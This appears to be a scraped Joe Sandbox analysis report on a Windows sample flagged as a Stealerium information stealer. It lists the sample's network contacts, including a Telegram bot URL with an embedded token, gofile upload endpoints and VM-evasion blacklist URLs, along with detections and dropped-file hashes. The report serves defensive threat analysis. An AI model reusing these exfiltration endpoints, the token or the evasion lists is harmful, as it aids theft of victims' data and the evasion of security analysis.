Unicode 18->37 dropped 31 netsh.exe 2 21->31         started        33 conhost.exe 21->33         started        35 chcp.com 1 21->35         started        signatures10 process11

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            K6aOw2Jmji.exe68%ReversingLabsByteCode-MSIL.Trojan.Zilla
                            K6aOw2Jmji.exe100%AviraTR/AVI.Stealerium.sbcde
                            K6aOw2Jmji.exe100%Joe Sandbox ML
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            raw.githubusercontent.com
                            185.199.108.133
                            truefalse
                              high
                              api.telegram.org
                              149.154.167.220
                              truefalse
                                high
                                api.gofile.io
                                45.112.123.126
                                truefalse
                                  high
                                  store5.gofile.io
                                  31.14.70.244
                                  truefalse
                                    high
                                    icanhazip.com
                                    104.16.185.241
                                    truefalse
                                      high
                                      54.229.13.0.in-addr.arpa
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txtfalse
                                          high
                                          https://szurubooru.zulipchat.com/api/v1/messagesfalse
                                            high
                                            https://api.gofile.io/serversfalse
                                              high
                                              https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMefalse
                                                high
                                                http://icanhazip.com/false
                                                  high
                                                  https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txtfalse
                                                    high
                                                    https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txtfalse
                                                      high
                                                      https://store5.gofile.io/uploadfilefalse
                                                        high
                                                        https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txtfalse
                                                          high
                                                          https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txtfalse
                                                            high
                                                            https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txtfalse
                                                              high
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://api.gofile.ioK6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://duckduckgo.com/chrome_newtabtmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp871D.tmp.dat.0.drfalse
                                                                    high
                                                                    https://duckduckgo.com/ac/?q=tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                      high
                                                                      https://api.telegram.orgK6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780066000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678006C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                          high
                                                                          https://api.telegram.org/botK6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/kgnfthK6aOw2Jmji.exefalse
                                                                              high
                                                                              https://github.com/icsharpcode/SharpZipLibK6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                  high
                                                                                  https://www.newtonsoft.com/jsonK6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://upx.sf.netAmcache.hve.13.drfalse
                                                                                      high
                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                        high
                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drfalse
                                                                                          high
                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drfalse
                                                                                            high
                                                                                            https://www.ecosia.org/newtab/tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp871D.tmp.dat.0.drfalse
                                                                                                high
                                                                                                https://api.gofile.io/K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://james.newtonking.com/projects/jsonK6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/K6aOw2Jmji.exefalse
                                                                                                      high
                                                                                                      https://ac.ecosia.org/autocomplete?q=tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                                        high
                                                                                                        https://raw.githubusercontent.comK6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstalltmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drfalse
                                                                                                            high
                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                                              high
                                                                                                              https://www.newtonsoft.com/jsonschemaK6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2162777253.00000267E9917000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://store5.gofile.io/XK6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://store5.gofile.ioK6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonK6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store5.gofile.ioK6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://icanhazip.comK6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.mozilla.orgtmp871D.tmp.dat.0.drfalse
                                                                                                                              high
                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplestmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drfalse
                                                                                                                                high
                                                                                                                                http://api.gofile.ioK6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameK6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/JamesNK/Newtonsoft.JsonK6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        149.154.167.220
                                                                                                                                        api.telegram.orgUnited Kingdom
                                                                                                                                        62041TELEGRAMRUfalse
                                                                                                                                        185.199.108.133
                                                                                                                                        raw.githubusercontent.comNetherlands
                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                        104.16.185.241
                                                                                                                                        icanhazip.comUnited States
                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                        45.112.123.126
                                                                                                                                        api.gofile.ioSingapore
                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                        31.14.70.244
                                                                                                                                        store5.gofile.ioVirgin Islands (BRITISH)
                                                                                                                                        199483LINKER-ASFRfalse
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1565209
                                                                                                                                        Start date and time:2024-11-29 12:27:31 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 6m 44s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:18
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:K6aOw2Jmji.exe
                                                                                                                                        renamed because original name is a hash value
                                                                                                                                        Original Sample Name:09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.rans.troj.spyw.evad.winEXE@19/85@7/5
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 74%
                                                                                                                                        • Number of executed functions: 302
                                                                                                                                        • Number of non-executed functions: 3
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                        • Execution Graph export aborted for target K6aOw2Jmji.exe, PID 6400 because it is empty
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        • VT rate limit hit for: K6aOw2Jmji.exe
                                                                                                                                        TimeTypeDescription
                                                                                                                                        06:28:25API Interceptor123x Sleep call for process: K6aOw2Jmji.exe modified
                                                                                                                                        06:29:12API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        149.154.167.220yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                          8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                            jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                              5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                                                                                                  nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                    MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                            104.16.185.241jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            GsZkXAmf61.exeGet hashmaliciousCelestial Rat, EICARBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            Quotation.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                            • icanhazip.com/
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            api.gofile.ioyv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            MayitaV16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            iDvmIRCPBw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            raw.githubusercontent.comTXj1ICMUqd.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.109.133
                                                                                                                                                            0b3SUiWz3y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.111.133
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            api.telegram.orgyv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            AWB8674109965.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            INQUIRY_pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            TELEGRAMRUfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            JUSTIFICANTE PAGO FRAS NOVIEMBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                            • 149.154.167.99
                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                            • 172.64.41.3
                                                                                                                                                            9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 104.16.184.241
                                                                                                                                                            https://docs.zoom.us/doc/nOwDrP_BRFeNjNel8fAbXgGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.18.95.41
                                                                                                                                                            LBswoftSFF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.26.12.205
                                                                                                                                                            3lpDhNtVKt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            FASTLYUSTXj1ICMUqd.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.109.133
                                                                                                                                                            0b3SUiWz3y.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.111.133
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            9arEd0o4IZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            IwSa5fjMWm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.110.133
                                                                                                                                                            051qAVqlq9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            rkGw58sHF5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            Vr39ff92jh.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eTXj1ICMUqd.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            qbVjvy9gv2.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            https://aysesuretobea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            TXj1ICMUqd.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            cY6HT7CeBF.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            lka01EskGw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            ELsb0Wg55V.exeGet hashmaliciousDcRatBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            lka01EskGw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.199.108.133
                                                                                                                                                            • 149.154.167.220
                                                                                                                                                            • 45.112.123.126
                                                                                                                                                            • 31.14.70.244
                                                                                                                                                            No context
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):65536
                                                                                                                                                            Entropy (8bit):1.4772805785670338
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:iqp8i/9G0HgramNsTmlzzzuiFlY4lO8O:BpR9G0HgraTwzzzuiFlY4lO8
                                                                                                                                                            MD5:4C4F47F4D450B9137B12F665FF9C66E3
                                                                                                                                                            SHA1:6C2F8F2AE254ECF752A590268917E8CEDBE6DD78
                                                                                                                                                            SHA-256:5E8C2F27D410D4561320D75AF5E9DECAD74CD35EDBB49EE20DE9F71278175B66
                                                                                                                                                            SHA-512:E45893310D3EF6087EBF887D42F0822F35CDEBC4CAB6C8D2B17357EF395CD6E16C86DE46C3EA411D9D7F34731BE30C7EB57A1594296F04601EFBC5E1719CBDDB
                                                                                                                                                            Malicious:true
